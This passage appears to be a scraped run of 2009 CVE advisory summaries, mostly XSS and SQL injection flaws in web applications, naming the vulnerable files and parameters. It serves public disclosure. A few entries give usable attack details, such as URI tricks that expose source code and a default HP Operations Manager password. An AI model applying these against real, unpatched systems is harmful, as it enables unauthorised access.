allows remote attackers to cause a denial of service (Management Console shutdown) via a crafted request. NOTE: some of these details are obtained from third party information. [CVE-2009-4602] Cross-site scripting (XSS) vulnerability in the Randomizer module 5.x through 5.x-1.0 and 6.x through 6.x-1.0, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4601] Cross-site scripting (XSS) vulnerability in basic_search_result.php in Zeeways ZeeJobsite 3x allows remote attackers to inject arbitrary web script or HTML via the title parameter. [CVE-2009-4596] Cross-site scripting (XSS) vulnerability in index.php in PHP Inventory 1.2 allows remote attackers to inject arbitrary web script or HTML via the sup_id parameter in a suppliers details action. [CVE-2009-4594] Unspecified vulnerability in IBM Lotus iNotes (aka Domino Web Access or DWA) before 229.131 for Domino 8.0.x has unknown impact and attack vectors, aka SPR SDOY7RHBNH. [CVE-2009-4590] Cross-site scripting (XSS) vulnerability in base_local_rules.php in Basic Analysis and Security Engine (BASE) before 1.4.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4589] Cross-site scripting (XSS) vulnerability in the Special:Block implementation in the getContribsLink function in SpecialBlockip.php in MediaWiki 1.14.0 and 1.15.0 allows remote attackers to inject arbitrary web script or HTML via the ip parameter. [CVE-2009-4588] Heap-based buffer overflow in the WindsPlayerIE.View.1 ActiveX control in WindsPly.ocx 3.5.0.0 Beta, 3.0.0.5, and earlier in AwingSoft Awakening Web3D Player and Winds3D Viewer allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a long SceneUrl property value, a different vulnerability than CVE-2009-2386. NOTE: some of these details are obtained from third party information. [CVE-2009-4587] Cherokee Web Server 0.5.4 allows remote attackers to cause a denial of service (daemon crash) via an MS-DOS reserved word in a URI, as demonstrated by the AUX reserved word. [CVE-2009-4586] Multiple cross-site scripting (XSS) vulnerabilities in index.html in Wowd client before 1.3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) sortby, (2) tags, or (3) ctx parameter in a search action. [CVE-2009-4585] UranyumSoft Listing Service stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for database/db.mdb. [CVE-2009-4580] Multiple cross-site scripting (XSS) vulnerabilities in Hasta Blog 2.3 allow remote attackers to inject arbitrary web script or HTML via the id parameter to (1) yorumyaz.php and (2) blog.php. [CVE-2009-4579] Cross-site scripting (XSS) vulnerability in the Artist avenue (com_artistavenue) component for Joomla! and Mambo allows remote attackers to inject arbitrary web script or HTML via the Itemid parameter to index.php. [CVE-2009-4578] Cross-site scripting (XSS) vulnerability in the Facileforms (com_facileforms) component for Joomla! and Mambo allows remote attackers to inject arbitrary web script or HTML via the Itemid parameter to index.php. [CVE-2009-4575] Cross-site scripting (XSS) vulnerability in the Q-Personel (com_qpersonel) component 1.0.2 RC2 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the personel_sira parameter in a sirala action to index.php. [CVE-2009-4573] Multiple cross-site scripting (XSS) vulnerabilities in the Joomulus (mod_joomulus) module 2.0 for Joomla! allow remote attackers to inject arbitrary web script or HTML via the tagcloud parameter in a tags action to (1) tagcloud_ell.swf, (2) tagcloud_eng.swf, (3) tagcloud_por.swf, (4) tagcloud_rus.swf, and possibly (5) tagcloud_jpn.swf. NOTE: the provenance of this information is unknown [CVE-2009-4570] Cross-site scripting (XSS) vulnerability in PhpShop 0.8.1 allows remote attackers to inject arbitrary web script or HTML via the order_id parameter in an order/order_print action to the default URI. [CVE-2009-4568] Cross-site scripting (XSS) vulnerability in Webmin before 1.500 and Usermin before 1.430 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4567] Multiple cross-site scripting (XSS) vulnerabilities in editprofile.php in Viscacha 0.8 Gold allow remote authenticated users to inject arbitrary web script or HTML via the (1) skype, (2) yahoo, (3) aol, (4) msn, or (5) jabber parameter in a profile2 action. NOTE: some of these details are obtained from third party information. [CVE-2009-4562] Cross-site scripting (XSS) vulnerability in zp-core/admin.php in Zenphoto 1.2.5 allows remote attackers to inject arbitrary web script or HTML via the from parameter. [CVE-2009-4561] Multiple SQL injection vulnerabilities in Admin/index.php in WebLeague 2.2.0, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) username and (2) password parameters. [CVE-2009-4560] SQL injection vulnerability in profile.php in WebLeague 2.2.0 allows remote attackers to execute arbitrary SQL commands via the name parameter. [CVE-2009-4559] Cross-site scripting (XSS) vulnerability in the Submitted By module 6.x before 6.x-1.3 for Drupal allows remote authenticated users, with "administer content types" privileges, to inject arbitrary web script or HTML via an input string for "submitted by" text. [CVE-2009-4557] Cross-site scripting (XSS) vulnerability in the Image Assist module 5.x-1.x before 5.x-1.8, 5.x-2.x before 2.0-alpha4, 6.x-1.x before 6.x-1.1, 6.x-2.x before 2.0-alpha4, and 6.x-3.x-dev before 2009-07-15, a module for Drupal, allows remote authenticated users, with image-node creation privileges, to inject arbitrary web script or HTML via a node title. [CVE-2009-4554] Multiple cross-site scripting (XSS) vulnerabilities in Snitz Forums 2000 3.4.07 allow remote attackers to inject arbitrary web script or HTML via (1) the url parameter to pop_send_to_friend.asp, related to a crafted onload attribute of an IMG element [CVE-2009-4552] Cross-site scripting (XSS) vulnerability in the Survey Pro module for Miniweb 2.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to index.php. [CVE-2009-4551] SQL injection vulnerability in the Survey Pro module for Miniweb 2.0 allows remote attackers to execute arbitrary SQL commands via the campaign_id parameter in a results action to index.php. [CVE-2009-4548] Multiple cross-site scripting (XSS) vulnerabilities in ViArt Helpdesk 3.x allow remote attackers to inject arbitrary web script or HTML via the category_id parameter to (1) products.php, (2) article.php, (3) product_details.php, or (4) reviews.php [CVE-2009-4547] Multiple cross-site scripting (XSS) vulnerabilities in ViArt CMS 3.x allow remote attackers to inject arbitrary web script or HTML via the (1) category_id parameter to forums.php, or the forum_id parameter to (2) forum.php or (3) forum_topic_new.php. [CVE-2009-4545] Logoshows BBS 2.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for database/globepersonnel.mdb. [CVE-2009-4544] Cross-site scripting (XSS) vulnerability in kbase/kbase.php in Cromosoft Technologies Facil Helpdesk 2.3 Lite allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. [CVE-2009-4542] Cross-site scripting (XSS) vulnerability in newticket.php in IsolSoft Support Center 2.5 allows remote attackers to inject arbitrary web script or HTML via the lang parameter. [CVE-2009-4539] Cross-site scripting (XSS) vulnerability in main.php in SQLiteManager 1.2.0 allows remote attackers to inject arbitrary web script or HTML via the redirect parameter. [CVE-2009-4535] Mongoose 2.8.0 and earlier allows remote attackers to obtain the source code for a web page by appending a / (slash) character to the URI. [CVE-2009-4534] Open redirect vulnerability in the FAQ Ask module 5.x and 6.x before 6.x-2.0, a module for Drupal, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. [CVE-2009-4533] The Webform module 5.x before 5.x-2.8 and 6.x before 6.x-2.8, a module for Drupal, does not prevent caching of a page that contains token placeholders for a default value, which allows remote attackers to read session variables via unspecified vectors. [CVE-2009-4532] Cross-site scripting (XSS) vulnerability in the Webform module 5.x before 5.x-2.8 and 6.x before 6.x-2.8, a module for Drupal, allows remote authenticated users, with webform creation privileges, to inject arbitrary web script or HTML via a field label. [CVE-2009-4531] httpdx 1.4.4 and earlier allows remote attackers to obtain the source code for a web page by appending a . (dot) character to the URI. [CVE-2009-4530] Mongoose 2.8.0 and earlier allows remote attackers to obtain the source code for a web page by appending ::$DATA to the URI. [CVE-2009-4529] InterVations NaviCOPA Web Server 3.0.1.2 and earlier allows remote attackers to obtain the source code for a web page via a trailing encoded space character in a URI, as demonstrated by /index.html%20 and /index.php%20 URIs. [CVE-2009-4527] The Shibboleth authentication module 5.x before 5.x-3.4 and 6.x before 6.x-3.2, a module for Drupal, does not properly remove statically granted privileges after a logout or other session change, which allows physically proximate attackers to gain privileges by using an unattended web browser. [CVE-2009-4525] Cross-site scripting (XSS) vulnerability in the Print (aka Printer, e-mail and PDF versions) module 5.x before 5.x-4.9 and 6.x before 6.x-1.9, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via crafted data in a list of links. [CVE-2009-4524] Cross-site scripting (XSS) vulnerability in the RealName module 6.x-1.x before 6.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via a realname (aka real name) element. [CVE-2009-4523] Cross-site scripting (XSS) vulnerability in index.php in Zainu 1.0 allows remote attackers to inject arbitrary web script or HTML via the searchSongKeyword parameter in a SearchSong action. [CVE-2009-4522] Cross-site scripting (XSS) vulnerability in search.5.html in BloofoxCMS 0.3.5 allows remote attackers to inject arbitrary web script or HTML via the search parameter to index.php. NOTE: some of these details are obtained from third party information. [CVE-2009-4521] Cross-site scripting (XSS) vulnerability in birt-viewer/run in Eclipse Business Intelligence and Reporting Tools (BIRT) before 2.5.0, as used in KonaKart and other products, allows remote attackers to inject arbitrary web script or HTML via the __report parameter. [CVE-2009-4518] Cross-site scripting (XSS) vulnerability in the Insert Node module 5.x before 5.x-1.2 for Drupal allows remote attackers to inject arbitrary web script or HTML via an inserted node. [CVE-2009-4516] Cross-site scripting (XSS) vulnerability in the FAQ Ask module 5.x and 6.x before 6.x-2.0, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4514] Cross-site scripting (XSS) vulnerability in the OpenSocial Shindig-Integrator module 5.x and 6.x before 6.x-2.1, a module for Drupal, allows remote authenticated users, with "create application" privileges, to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4513] Multiple cross-site scripting (XSS) vulnerabilities in the Workflow module 5.x before 5.x-2.4 and 6.x before 6.x-1.2, a module for Drupal, allow remote authenticated users, with "administer workflow" privileges, to inject arbitrary web script or HTML via the name of a (1) workflow or (2) workflow state. [CVE-2009-4509] The administrative web console on the TANDBERG Video Communication Server (VCS) before X4.3 uses predictable session cookies in (1) tandberg/web/lib/secure.php and (2) tandberg/web/user/lib/secure.php, which makes it easier for remote attackers to bypass authentication, and execute arbitrary code by loading a custom software update, via a crafted "Cookie: tandberg_login=" HTTP header. [CVE-2009-4505] Multiple cross-site scripting (XSS) vulnerabilities in OpenCMS OAMP Comments Module 1.0.1 allow remote attackers to inject arbitrary web script or HTML via the name field in a comment, and other unspecified vectors. [CVE-2009-4497] Cross-site scripting (XSS) vulnerability in LXR Cross Referencer 0.9.5 and 0.9.6 allows remote attackers to inject arbitrary web script or HTML via the i parameter to the ident program. [CVE-2009-4492] WEBrick 1.3.1 in Ruby 1.8.6 through patchlevel 383, 1.8.7 through patchlevel 248, 1.8.8dev, 1.9.1 through patchlevel 376, and 1.9.2dev writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to modify a window's title, or possibly execute arbitrary commands or overwrite files, via an HTTP request containing an escape sequence for a terminal emulator. [CVE-2009-4480] Buffer overflow in the web service in AzeoTech DAQFactory 5.77 might allow remote attackers to execute arbitrary code via unspecified vectors, as demonstrated by a certain module in VulnDisco Pack Professional 7.16 through 8.11. NOTE: as of 20091229, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2009-4478] Multiple cross-site scripting (XSS) vulnerabilities in Xstate Real Estate 1.0 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) home.html or (2) lands.html. [CVE-2009-4473] Multiple cross-site scripting (XSS) vulnerabilities in WorkArea/ContentDesigner/ekformsiframe.aspx in Ektron CMS400.NET 7.6.1.53 and 7.6.6.47, and possibly 7.52 through 7.66sp2, allow remote attackers to inject arbitrary web script or HTML via the (1) css, (2) eca, (3) id, and (4) skin parameters. NOTE: some of these details are obtained from third party information. [CVE-2009-4469] Multiple cross-site scripting (XSS) vulnerabilities in pagenumber.inc.php in phpPowerCards 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) PATH_INFO, the (2) archiv parameter, and the (3) subcat parameter. [CVE-2009-4468] Cross-site scripting (XSS) vulnerability in misc.php in DeluxeBB 1.3 allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2009-4465] DeluxeBB 1.3 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain user and configuration information, log data, and gain administrative access via a direct request to scripts in (1) templates/ including (2) templates/deluxe/admincp/, (3) templates/corporate/admincp/, and (4) templates/blue/admincp/ [CVE-2009-4464] Cross-site scripting (XSS) vulnerability in searchadvance.asp in Active Business Directory 2 allows remote attackers to inject arbitrary web script or HTML via the search parameter. [CVE-2009-4463] Intellicom NetBiter WebSCADA devices use default passwords for the HICP network configuration service, which makes it easier for remote attackers to modify network settings and cause a denial of service. NOTE: this is only a vulnerability when the administrator does not follow recommendations in the product's installation documentation. NOTE: this issue was originally reported to be hard-coded passwords, not default passwords. [CVE-2009-4462] Stack-based buffer overflow in the NetBiterConfig utility (NetBiterConfig.exe) 1.3.0 for Intellicom NetBiter WebSCADA allows remote attackers to execute arbitrary code via a long hn (hostname) parameter in a crafted HICP-protocol UDP packet. [CVE-2009-4461] Multiple cross-site scripting (XSS) vulnerabilities in FlatPress 0.909 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) contact.php, (2) login.php, and (3) search.php. [CVE-2009-4460] Multiple cross-site scripting (XSS) vulnerabilities in Auto-Surf Traffic Exchange Script 1.1 allow remote attackers to inject arbitrary web script or HTML via the rid parameter to (1) index.php, (2) faq.php, and (3) register.php. [CVE-2009-4458] Multiple cross-site scripting (XSS) vulnerabilities in FreePBX 2.5.2 and 2.6.0rc2, and possibly other versions, allow remote attackers to inject arbitrary web script or HTML via the (1) tech parameter to admin/admin/config.php during a trunks display action, the (2) description parameter during an Add Zap Channel action, and (3) unspecified vectors during an Add Recordings action. [CVE-2009-4457] Multiple unspecified vulnerabilities in the Vsftpd Webmin module before 1.3b for the Vsftpd server have unknown impact and attack vectors related to "Some security issues." [CVE-2009-4455] The default configuration of Cisco ASA 5500 Series Adaptive Security Appliance (Cisco ASA) 7.0, 7.1, 7.2, 8.0, 8.1, and 8.2 allows portal traffic to access arbitrary backend servers, which might allow remote authenticated users to bypass intended access restrictions and access unauthorized web sites via a crafted URL obfuscated with ROT13 and a certain encoding. NOTE: this issue was originally reported as a vulnerability related to lack of restrictions to URLs listed in the Cisco WebVPN bookmark component, but the vendor states that "The bookmark feature is not a security feature." [CVE-2009-4450] Multiple cross-site scripting (XSS) vulnerabilities in map.php in LiveZilla 3.1.8.3 allow remote attackers to inject arbitrary web script or HTML via the (1) lat, (2) lng, and (3) zom parameters, which are not properly handled when processed with templates/map.tpl. [CVE-2009-4446] Cross-site scripting (XSS) vulnerability in admin.php in phpInstantGallery 1.1 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. [CVE-2009-4436] Multiple SQL injection vulnerabilities in Active Web Softwares eWebquiz 8 allow remote attackers to execute arbitrary SQL commands via the QuizID parameter to (1) questions.asp, (2) importquestions.asp, and (3) quiztakers.asp, different vectors than CVE-2007-1706. [CVE-2009-4433] Multiple cross-site scripting (XSS) vulnerabilities in IDevSpot iSupport 1.8 and earlier allow remote attackers to inject arbitrary web script or HTML via the (a) 5 or (b) 9 field in a post action to ticket_function.php, reachable through ticket_submit.php and index.php [CVE-2009-4429] Cross-site scripting (XSS) vulnerability in the Sections module 5.x before 5.x-1.3 and 6.x before 6.x-1.3 for Drupal allows remote authenticated users with "administer sections" privileges to inject arbitrary web script or HTML via a section name (aka the Name field). [CVE-2009-4425] Cross-site scripting (XSS) vulnerability in index.php in iDevCart 1.09 allows remote attackers to inject arbitrary web script or HTML via the SEARCH parameter in a browse action. [CVE-2009-4422] Multiple cross-site scripting (XSS) vulnerabilities in the GetURLArguments function in jpgraph.php in Aditus Consulting JpGraph 3.0.6 allow remote attackers to inject arbitrary web script or HTML via a key to csim_in_html_ex1.php, and other unspecified vectors. [CVE-2009-4416] Cross-site scripting (XSS) vulnerability in login.php in phpGroupWare 0.9.16.12, and possibly other versions before 0.9.16.014, allows remote attackers to inject arbitrary web script or HTML via an arbitrary parameter whose name begins with the "phpgw_" sequence. [CVE-2009-4408] Multiple cross-site scripting (XSS) vulnerabilities in models.parser in PyForum 1.0.3 and possibly earlier versions, and possibly zForum, allow remote attackers to inject arbitrary web script or HTML via crafted BBcode (1) img or (2) url tags, which are not properly handled when a post is viewed. [CVE-2009-4406] Cross-site scripting (XSS) vulnerability in Forms/login1 in American Power Conversion (APC) Switched Rack PDU AP7932 B2, running rpdu 3.3.3 or 3.7.0 on AOS 3.3.4, and possibly other versions, allows remote attackers to inject arbitrary web script or HTML via the login_username parameter. [CVE-2009-4403] Cross-site scripting (XSS) vulnerability in index.php in Rumba XML 1.8 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. NOTE: some of these details are obtained from third party information. [CVE-2009-4402] The default configuration of SQL-Ledger 2.8.24 allows remote attackers to perform unspecified administrative operations by providing an arbitrary password to the admin interface. [CVE-2009-4400] Cross-site scripting (XSS) vulnerability in the Parish Administration Database (ste_parish_admin) extension 0.1.3 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4398] Cross-site scripting (XSS) vulnerability in the Parish of the Holy Spirit Religious Art Gallery (hs_religiousartgallery) extension 0.1.2 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4397] Cross-site scripting (XSS) vulnerability in the Diocese of Portsmouth Resources Database (pd_resources) extension 0.1.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4395] Cross-site scripting (XSS) vulnerability in the Random Prayer 2 (ste_prayer2) extension 0.0.3 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4391] Cross-site scripting (XSS) vulnerability in the File list (dr_blob) extension 2.1.1 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4388] Cross-site scripting (XSS) vulnerability in the ListMan (nl_listman) extension 1.2.1 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4387] The cross-site scripting (XSS) protection mechanism in ShowInContentAreaAction.do in ManageEngine Password Manager Pro (PMP) before 6.1 Build 6104 uses case-sensitive checks for malicious inputs, which allows remote attackers to inject arbitrary web script or HTML via the searchtext parameter and other unspecified inputs. [CVE-2009-4384] Multiple cross-site scripting (XSS) vulnerabilities in Scriptsez.net Ez Poll Hoster (EPH) allow remote attackers to inject arbitrary web script or HTML via the (1) pid parameter in a code action to index.php and the (2) uid parameter in a view action to profile.php. [CVE-2009-4382] Cross-site scripting (XSS) vulnerability in module.php in PHPFABER CMS, possibly 1.3.36, allows remote attackers to inject arbitrary web script or HTML via the mod parameter. [CVE-2009-4381] Cross-site scripting (XSS) vulnerability in index.php in texmedia Million Pixel Script 3 allows remote attackers to inject arbitrary web script or HTML via the pa parameter. NOTE: some of these details are obtained from third party information. [CVE-2009-4380] Multiple SQL injection vulnerabilities in Valarsoft Webmatic before 3.0.3 allow remote attackers to execute arbitrary SQL commands via unspecified vectors, a different issue than CVE-2008-2925. [CVE-2009-4379] Multiple cross-site scripting (XSS) vulnerabilities in Valarsoft Webmatic before 3.0.3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different issue than CVE-2008-2924. [CVE-2009-4371] Cross-site scripting (XSS) vulnerability in the Locale module (modules/locale/locale.module) in Drupal Core 6.14, and possibly other versions including 6.15, allows remote authenticated users with "administer languages" permissions to inject arbitrary web script or HTML via the (1) Language name in English or (2) Native language name fields in the Custom language form. [CVE-2009-4370] Cross-site scripting (XSS) vulnerability in the Menu module (modules/menu/menu.admin.inc) in Drupal Core 6.x before 6.15 allows remote authenticated users with permissions to create new menus to inject arbitrary web script or HTML via a menu description, which is not properly handled in the menu administration overview. [CVE-2009-4369] Cross-site scripting (XSS) vulnerability in the Contact module (modules/contact/contact.admin.inc or modules/contact/contact.module) in Drupal Core 5.x before 5.21 and 6.x before 6.15 allows remote authenticated users with "administer site-wide contact form" permissions to inject arbitrary web script or HTML via the contact category name. [CVE-2009-4367] The Staging Webservice ("sitecore modules/staging/service/api.asmx") in Sitecore Staging Module 5.4.0 rev.080625 and earlier allows remote attackers to bypass authentication and (1) upload files, (2) download files, (3) list directories, and (4) clear the server cache via crafted SOAP requests with arbitrary Username and Password values, possibly related to a direct request. [CVE-2009-4366] Cross-site scripting (XSS) vulnerability in index.php in ScriptsEz Ez Blog 1.0 allows remote attackers to inject arbitrary web script or HTML via the yr parameter in a bmonth action. [CVE-2009-4364] Cross-site scripting (XSS) vulnerability in index.php in ScriptsEz Ez Blog allows remote attackers to inject arbitrary web script or HTML via the cname parameter, related to the act and id parameters. NOTE: the provenance of this information is unknown [CVE-2009-4363] Text_Filter/lib/Horde/Text/Filter/Xss.php in Horde Application Framework before 3.3.6, Horde Groupware before 1.2.5, and Horde Groupware Webmail Edition before 1.2.5 does not properly handle data: URIs, which allows remote attackers to conduct cross-site scripting (XSS) attacks via data:text/html values for the HREF attribute of an A element in an HTML e-mail message. NOTE: the vendor states that the issue is caused by "an XSS vulnerability in Firefox browsers." [CVE-2009-4360] SQL injection vulnerability in modules/content/index.php in the Content module 0.5 for XOOPS allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2009-4359] Cross-site scripting (XSS) vulnerability in folder.php in the SmartMedia 0.85 Beta module for XOOPS allows remote attackers to inject arbitrary web script or HTML via the categoryid parameter. [CVE-2009-4354] TransWARE Active! mail 2003 build 2003.0139.0871 and earlier does not properly secure the session ID in a session cookie, which allows remote attackers to hijack web sessions, probably related to the "secure" flag for cookies in SSL sessions. [CVE-2009-4353] The Mobile Edition of TransWARE Active! mail 2003 build 2003.0139.0871 and earlier, and possibly other versions before 2003.0139.0911, does not remove the session ID in a Referer URL, which allows remote attackers to hijack web sessions via vectors such as an email with an embedded URL. [CVE-2009-4352] Multiple cross-site scripting (XSS) vulnerabilities in TransWARE Active! mail 2003 build 2003.0139.0871 and earlier, and possibly other versions before 2003.0139.0939, allow remote attackers to inject arbitrary web script or HTML via the (1) From, (2) To, (3) Cc, and (4) Bcc parameters. [CVE-2009-4348] Cross-site scripting (XSS) vulnerability in index.php in Harold Bakker's NewsScript (HB-NS) 1.3 allows remote attackers to inject arbitrary web script or HTML via the topic parameter in a topic action, a different vector than CVE-2006-2146. [CVE-2009-4347] Cross-site scripting (XSS) vulnerability in daloradius-users/login.php in daloRADIUS 0.9-8 and earlier allows remote attackers to inject arbitrary web script or HTML via the error parameter. [CVE-2009-4346] Cross-site scripting (XSS) vulnerability in the Frontend news submitter with RTE (fe_rtenews) extension 1.4.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4345] Cross-site scripting (XSS) vulnerability in the vShoutbox (vshoutbox) extension 0.0.1 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4344] Cross-site scripting (XSS) vulnerability in the ZID Linkliste (zid_linklist) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4343] Cross-site scripting (XSS) vulnerability in the Training Company Database (trainincdb) extension 0.4.7 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4340] Cross-site scripting (XSS) vulnerability in the No indexed Search (no_indexed_search) extension 0.2.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4336] Cross-site scripting (XSS) vulnerability in the Diocese of Portsmouth Calendar (pd_calendar) extension 0.4.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4325] The Client Interfaces component in IBM DB2 8.2 before FP18, 9.1 before FP8, 9.5 before FP5, and 9.7 before FP1 does not validate an unspecified pointer, which allows attackers to overwrite "external memory" via unknown vectors, related to a missing "check for null pointers." [CVE-2009-4320] Cross-site scripting (XSS) vulnerability in searchform.php in The Next Generation of Genealogy Sitebuilding (TNG) 7.1.2 allows remote attackers to inject arbitrary web script or HTML via the msg parameter. [CVE-2009-4318] Cross-site scripting (XSS) vulnerability in index.php in Real Estate Manager 1.0.1 allows remote attackers to inject arbitrary web script or HTML via the lang parameter. NOTE: some of these details are obtained from third party information. [CVE-2009-4317] Cross-site scripting (XSS) vulnerability in index.php in ScriptsEz Ez Cart allows remote attackers to inject arbitrary web script or HTML via the sid parameter in a showcat action. [CVE-2009-4316] Cross-site scripting (XSS) vulnerability in searchresults_main.php in ZeeLyrics 3x allows remote attackers to inject arbitrary web script or HTML via the keyword parameter. NOTE: the provenance of this information is unknown [CVE-2009-4266] Cross-site scripting (XSS) vulnerability in search.php in YABSoft Advanced Image Hosting (AIH) Script 2.2, and possibly 2.3, allows remote attackers to inject arbitrary web script or HTML via the text parameter. [CVE-2009-4255] Cross-site scripting (XSS) vulnerability in the You!Hostit! template 1.0.1 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the created_by_alias parameter in index.php. [CVE-2009-4253] Cross-site scripting (XSS) vulnerability in dspStats.php in PowerPhlogger 2.2.5 allows remote attackers to inject arbitrary web script or HTML via the edit parameter. [CVE-2009-4252] Cross-site scripting (XSS) vulnerability in images.php in Image Hosting Script DPI 1.1 Final (1.1F) allows remote attackers to inject arbitrary web script or HTML via the date parameter. NOTE: some of these details are obtained from third party information. [CVE-2009-4250] Multiple cross-site scripting (XSS) vulnerabilities in CutePHP CuteNews 1.4.6 and UTF-8 CuteNews before 8b allow remote attackers to inject arbitrary web script or HTML via (1) the result parameter to register.php [CVE-2009-4249] Multiple cross-site scripting (XSS) vulnerabilities in CutePHP CuteNews 1.4.6, when register_globals is enabled and magic_quotes_gpc is disabled, allow remote attackers to inject arbitrary web script or HTML via the (1) lastusername and (2) mod parameters to index.php [CVE-2009-4246] Stack-based buffer overflow in RealNetworks RealPlayer 10, RealPlayer 10.5 6.0.12.1040 through 6.0.12.1741, RealPlayer 11 11.0.0 through 11.0.4, RealPlayer Enterprise, Mac RealPlayer 10 and 10.1, Linux RealPlayer 10, and Helix Player 10.x allows user-assisted remote attackers to execute arbitrary code via a malformed .RJS skin file that contains a web.xmb file with crafted length values. [CVE-2009-4239] Cross-site scripting (XSS) vulnerability in the Web console in IBM InfoSphere Information Server 8.1 before FP1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4237] Multiple cross-site scripting (XSS) vulnerabilities in TestLink before 1.8.5 allow remote attackers to inject arbitrary web script or HTML via (1) the req parameter to login.php, and allow remote authenticated users to inject arbitrary web script or HTML via (2) the key parameter to lib/general/staticPage.php, (3) the tableName parameter to lib/attachments/attachmentupload.php, or the (4) startDate, (5) endDate, or (6) logLevel parameter to lib/events/eventviewer.php [CVE-2009-4234] Cross-site scripting (XSS) vulnerability in loginpages/error_user.shtml on the Micronet Network Access Controller SP1910 allows remote attackers to inject arbitrary web script or HTML via the msg parameter. [CVE-2009-4233] Cross-site scripting (XSS) vulnerability in modules/mod_yj_whois.php in the YJ Whois component 1.0x and 1.5.x for Joomla! allows remote attackers to inject arbitrary web script or HTML via the domain parameter to index.php. NOTE: some of these details are obtained from third party information. [CVE-2009-4229] Multiple SQL injection vulnerabilities in ActiveWebSoftwares Active Bids allow remote attackers to execute arbitrary SQL commands via (1) the catid parameter in the PATH_INFO to the default URI or (2) the catid parameter to default.asp. NOTE: this might overlap CVE-2009-0429.3. NOTE: the provenance of this information is unknown [CVE-2009-4223] PHP remote file inclusion vulnerability in adm/krgourl.php in KR-Web 1.1b2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter. [CVE-2009-4214] Cross-site scripting (XSS) vulnerability in the strip_tags function in Ruby on Rails before 2.2.s, and 2.3.x before 2.3.5, allows remote attackers to inject arbitrary web script or HTML via vectors involving non-printing ASCII characters, related to HTML::Tokenizer and actionpack/lib/action_controller/vendor/html-scanner/html/node.rb. [CVE-2009-4209] Multiple cross-site scripting (XSS) vulnerabilities in admin/index.php in moziloCMS 1.11.1 allow remote attackers to inject arbitrary web script or HTML via the (1) cat and (2) file parameters in an editsite action, different vectors than CVE-2008-6127 and CVE-2009-1367. [CVE-2009-4207] Cross-site scripting (XSS) vulnerability in the Webform module 5.x before 5.x-2.7 and 6.x before 6.x-2.7, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via a submission. [CVE-2009-4197] rpwizPppoe.htm in Huawei MT882 V100R002B020 ARG-T running firmware 3.7.9.98 contains a form that does not disable the autocomplete setting for the password parameter, which makes it easier for local users or physically proximate attackers to obtain the password from web browsers that support autocomplete. [CVE-2009-4196] Multiple cross-site scripting (XSS) vulnerabilities in multiple scripts in Forms/ in Huawei MT882 V100R002B020 ARG-T running firmware 3.7.9.98 allow remote attackers to inject arbitrary web script or HTML via the (1) BackButton parameter to error_1 [CVE-2009-4189] HP Operations Manager has a default password of OvWbusr1 for the ovwebusr account, which allows remote attackers to execute arbitrary code via a session that uses the manager role to conduct unrestricted file upload attacks against the /manager servlet in the Tomcat servlet container. NOTE: this might overlap CVE-2009-3099 and CVE-2009-3843. [CVE-2009-4187] Multiple cross-site scripting (XSS) vulnerabilities in the Gateway component in Sun Java System Portal Server 6.3.1, 7.1, and 7.2 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4185] Cross-site scripting (XSS) vulnerability in proxy/smhui/getuiinfo in HP System Management Homepage (SMH) before 6.0 allows remote attackers to inject arbitrary web script or HTML via the servercert parameter. [CVE-2009-4182] Multiple unspecified vulnerabilities in HP Web Jetadmin 10.2, when a remote SQL server is used, allow remote attackers to obtain access to data or cause a denial of service, possibly by leveraging authentication and encryption weaknesses on the SQL server. [CVE-2009-4181] Stack-based buffer 